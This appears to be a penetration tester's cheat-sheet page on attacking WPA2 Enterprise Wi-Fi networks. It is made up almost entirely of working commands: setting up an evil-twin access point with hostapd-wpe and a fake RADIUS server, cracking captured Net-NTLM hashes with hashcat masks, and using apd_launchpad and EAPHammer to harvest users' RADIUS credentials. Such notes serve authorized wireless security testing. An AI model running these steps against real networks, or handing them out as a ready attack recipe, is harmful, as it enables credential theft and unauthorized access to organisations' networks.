Enterprise

Wi-Fi Protected Access Enterprise

hostapd-wpe

1. Install dependencies:

$ sudo apt install libnl-3-dev libssl-dev
$ sudo apt install hostapd-wpe

2. Install and configure hostapd-wpe:

$ sudo vi /etc/hostapd-wpe/hostapd-wpe.conf
...
interface=wlan1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ssid=NotEvilTwinAP
channel=1
hw_mode=b
auth_server_addr=127.0.0.1
auth_server_port=18120
auth_server_shared_secret=S3cr3t!
wpa_pairwise=TKIP CCMP

3. Run fake AP with RADIUS server:

$ sudo airmon-ng check kill
$ sudo /usr/sbin/hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

4. Crack Net-NTLM hashes (mask example):

$ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l ?1?1?1?1?1?1?1?1
$ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u ?1?1?1?1?1?1?1?1
$ hashcat -m 5500 -a 3 net-ntlmv1.txt -1 ?d?l?u?s ?1?1?1?1?1?1?1?1

apd_launchpad

$ python ~/tools/apd_launchpad/apd_launchpad.py -t radius -s MegaCorp -i wlan1 -ch 1 -cn '*.megacorp.local' -o MegaCorp
$ vi radius/radius.conf
...
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user

EAPHammer

https://github.com/s0lst1c3/eaphammer

Setup:

$ git clone https://github.com/s0lst1c3/eaphammer.git ~/tools/eaphammer && cd ~/tools/eaphammer
$ sudo ./kali-setup
$ sudo python3 -m pip install flask-cors flask-socketio --upgrade

Create a certificate:

$ sudo ./eaphammer --cert-wizard

Steal RADIUS creds:

$ sudo ./eaphammer --bssid 1C:7E:E5:97:79:B1 --essid Example --channel 1 --interface wlan1 --auth wpa-eap --creds

Last updated 4 years ago

hashtaghostapd-wpe

hashtagapd_launchpad

hashtagEAPHammer

hostapd-wpe

apd_launchpad

EAPHammer